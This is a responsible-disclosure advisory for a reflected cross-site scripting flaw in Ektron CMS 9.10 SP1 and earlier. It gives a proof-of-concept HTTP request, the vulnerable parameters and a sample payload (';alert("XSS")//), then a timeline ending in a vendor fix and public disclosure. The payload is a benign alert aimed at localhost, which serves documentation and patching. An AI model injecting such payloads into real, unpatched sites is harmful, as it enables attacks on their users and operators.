# Vulnerability type: Cross-site Scripting # Vendor: http://www.ektron.com/ # Product: Ektron Content Management System # Affected version: =< 9.10 SP1 (Build 9.1.0.184.1.102) # Patched version: 9.10 SP1 (Build 9.1.0.184.1.114) # Credit: Jerold Hoong # PROOF OF CONCEPT (XSS) Cross-site scripting (XSS) vulnerability in workarea.aspx in Ektron CMS 9.10 SP1 on build 9.1.0.184.1.102 and earlier allows remote authenticated users to inject arbitrary javascript via the page, action, folder_id and LangType parameters. GET /Test/WorkArea/workarea.aspx?page=content.aspx%27%3balert %28%22XSS%22%29%2f%2f&action=ViewContentByCategory&folder_id=0 &LangType=1033 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate .. [SNIP] ... Cookie: EktGUID=014949ec-36ac-4b89-9c0b-8b03ed29b0ed; EkAnalytics=0; ASP.NET_SessionId=zxucmt5zyugbtwrm4vseakw5; .. [SNIP] ... # VULNERABLE PARAMETERS: - page - action - folder_id - LangType # SAMPLE PAYLOAD - ';alert("XSS")// # TIMELINE ? 07/04/2015: Vulnerability found ? 07/04/2015: Vendor informed ? 08/04/2015: Vendor responded and acknowledged ? 28/05/2015: Vendor fixed the issue ? 31/05/2015: Public disclosure
